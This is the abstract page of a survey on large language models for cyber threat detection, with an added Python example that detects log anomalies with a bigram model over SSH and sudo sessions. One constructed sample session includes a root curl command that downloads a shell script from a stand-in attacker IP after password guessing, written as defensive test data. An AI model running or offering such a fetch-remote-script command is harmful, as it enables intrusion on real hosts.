Cite this article:
  • Song Zekai, Liu Jinhao, Zheng Wen, Cui Susu, Jiang Bo, Han Dongxu, Liu Qixu, Liu Yuling. Large Language Models Driving Cyber Security Threat Detection: Progress and Trends [J]. Journal of Cyber Security, accepted.
Large Language Models Driving Cyber Security Threat Detection: Progress and Trends
Song Zekai1, Liu Jinhao1, Zheng Wen2, Cui Susu1, Jiang Bo1, Han Dongxu1, Liu Qixu1, Liu Yuling1
(1. Institute of Information Engineering, Chinese Academy of Sciences; 2. Qingdao Customs)
Abstract:
As modern technology continues to evolve, cyber security problems are growing more serious: advanced and persistent threat attacks keep increasing, and attack techniques are becoming more covert and more complex. Past research on cyber threat detection has relied mostly on rule-based and machine-learning-based methods, but both have clear limitations against new and unknown threats. Rule-based detection depends heavily on expert knowledge, while machine-learning detection requires features to be extracted and selected by hand, which consumes substantial human and material resources and limits the generalization ability of the resulting models. In recent years, large language models (such as GPT-4, BERT and PaLM) have opened a new path for cyber threat detection, showing strong performance and potential especially where large amounts of unlabeled data are available. This paper comprehensively surveys cyber threat detection techniques based on large language models. It first summarizes the core tasks of cyber threat detection and analyzes the challenges each currently faces: network traffic anomaly detection, system log analysis, malicious code detection, and threat intelligence analysis. It then outlines the general training and usage pipeline of large language models and the mainstream models, and analyzes in detail the applications and potential of large language models in cyber threat detection in recent years. These models can automatically extract complex features from large volumes of unlabeled multimodal data, and therefore perform strongly at identifying malicious code, anomalous network traffic, and similar targets. Finally, based on current research progress, the paper points out the challenges that remain for large language models in cyber threat detection, such as privacy and security issues and interpretability, and proposes future research directions.
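To make the system log analysis task described in the abstract concrete, the following is an added illustration, not code from the paper or from any system it surveys. It learns event-sequence structure from unlabeled normal sessions and flags sessions the model finds surprising, which is the pipeline shape of language-model-based log anomaly detectors. Assumptions: a smoothed bigram model over log templates stands in for the pretrained Transformer a real system would use, the regex masking stands in for a template miner such as Drain, the log lines are constructed, and the threshold rule (1.5 times the worst training score) is an assumed heuristic.

```python
"""Added illustration (not the paper's code): a toy language model over system logs. A smoothed
bigram model over log templates stands in for a pretrained Transformer; regex masking for Drain."""
import math
import re
from collections import Counter, defaultdict

# Constructed sample data (not from any real host): two normal SSH sessions, unlabeled training data.
NORMAL_SESSIONS = [
    [
        "sshd[1201]: Accepted publickey for alice from 10.0.0.5 port 51022",
        "sshd[1201]: pam_unix(sshd:session): session opened for user alice",
        "sudo: alice : TTY=pts/0 ; COMMAND=/usr/bin/systemctl status nginx",
        "sshd[1201]: pam_unix(sshd:session): session closed for user alice",
    ],
    [
        "sshd[1340]: Accepted publickey for bob from 10.0.0.9 port 40211",
        "sshd[1340]: pam_unix(sshd:session): session opened for user bob",
        "sudo: bob : TTY=pts/1 ; COMMAND=/usr/bin/journalctl -u nginx",
        "sshd[1340]: pam_unix(sshd:session): session closed for user bob",
    ],
]
# Constructed: password guessing that ends in a root login and a download.
SUSPICIOUS_SESSION = [
    "sshd[2210]: Failed password for root from 203.0.113.7 port 33001",
    "sshd[2210]: Failed password for root from 203.0.113.7 port 33002",
    "sshd[2210]: Accepted password for root from 203.0.113.7 port 33003",
    "sudo: root : TTY=pts/2 ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh",
]
# Constructed: every event type is known from training, only the order is wrong.
REORDERED_SESSION = [
    "sudo: carol : TTY=pts/3 ; COMMAND=/usr/bin/systemctl status nginx",
    "sshd[1502]: Accepted publickey for carol from 10.0.0.12 port 44100",
    "sshd[1502]: pam_unix(sshd:session): session opened for user carol",
    "sshd[1502]: pam_unix(sshd:session): session closed for user carol",
]
# Parameter masking; order matters (IPs before plain numbers, URLs after IPs).
_PARAM_PATTERNS = [
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "<IP>"),
    (re.compile(r"\bhttps?://\S+"), "<URL>"),
    (re.compile(r"\b\d+\b"), "<NUM>"),
    (re.compile(r"(?<=for )\w+(?= from)"), "<USER>"),
    (re.compile(r"(?<=for user )\w+"), "<USER>"),
    (re.compile(r"(?<=sudo: )\w+"), "<USER>"),
]

def to_template(line: str) -> str:
    """Collapse a raw log line to its event template by masking variable fields."""
    for pattern, placeholder in _PARAM_PATTERNS:
        line = pattern.sub(placeholder, line)
    return line

class TemplateBigramModel:
    """Bigram language model over template sequences with add-k smoothing."""
    START, END, UNK = "<S>", "</S>", "<UNK>"

    def __init__(self, k: float = 0.5):
        self.k = k  # keeps unseen transitions at a small non-zero probability
        self.bigrams = defaultdict(Counter)
        self.vocab = {self.START, self.END, self.UNK}

    def fit(self, sessions):
        for session in sessions:
            seq = [self.START] + [to_template(line) for line in session] + [self.END]
            self.vocab.update(seq)
            for prev, cur in zip(seq, seq[1:]):
                self.bigrams[prev][cur] += 1
        return self

    def _prob(self, prev, cur):
        counts = self.bigrams.get(prev, Counter())
        return (counts[cur] + self.k) / (sum(counts.values()) + self.k * len(self.vocab))

    def transitions(self, session):
        # Per-transition surprise in nats: (previous template, current template, -log p).
        seq = [self.START]
        for line in session:
            template = to_template(line)
            seq.append(template if template in self.vocab else self.UNK)
        seq.append(self.END)
        return [(p, c, -math.log(self._prob(p, c))) for p, c in zip(seq, seq[1:])]

    def score(self, session):
        """Mean surprise per transition, i.e. the session's log-perplexity."""
        steps = self.transitions(session)
        return sum(s for _, _, s in steps) / len(steps)

def threshold_from_training(model, sessions, margin=1.5):
    # Assumed heuristic: flag anything `margin` times worse than the worst training session.
    return margin * max(model.score(s) for s in sessions)

def most_surprising_step(model, session):
    """The single transition that contributed most to the score, for the analyst."""
    return max(model.transitions(session), key=lambda step: step[2])

if __name__ == "__main__":
    model = TemplateBigramModel().fit(NORMAL_SESSIONS)
    thr = threshold_from_training(model, NORMAL_SESSIONS)
    for s in (NORMAL_SESSIONS[0], SUSPICIOUS_SESSION, REORDERED_SESSION):
        print(f"score={model.score(s):.2f} flagged={model.score(s) > thr}", most_surprising_step(model, s))
```

Two points the toy makes that the abstract only states: the brute-force session is flagged because its templates were never seen (they map to `<UNK>`), but the reordered session is flagged even though every template is known, because the sequence model scores the transition order; a per-line rule or a bag-of-templates check would pass it. `most_surprising_step` returns the transition that drove the score, a minimal answer to the interpretability problem the abstract lists among the open challenges. A real deployment replaces the bigram model with a pretrained language model fine-tuned on the same template sequences and calibrates the threshold on held-out normal data rather than on the training sessions.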
Keywords:  cyber threat detection  large language model  network traffic anomaly detection  system log detection  malicious code detection  threat intelligence analysis
DOI:
Submitted: 2024-02-28. Revised: 2024-05-29.
Funding: Open Project of the National Engineering Research Center for Cyber Security Classified Protection and Safeguard Technology (No. C21640-3).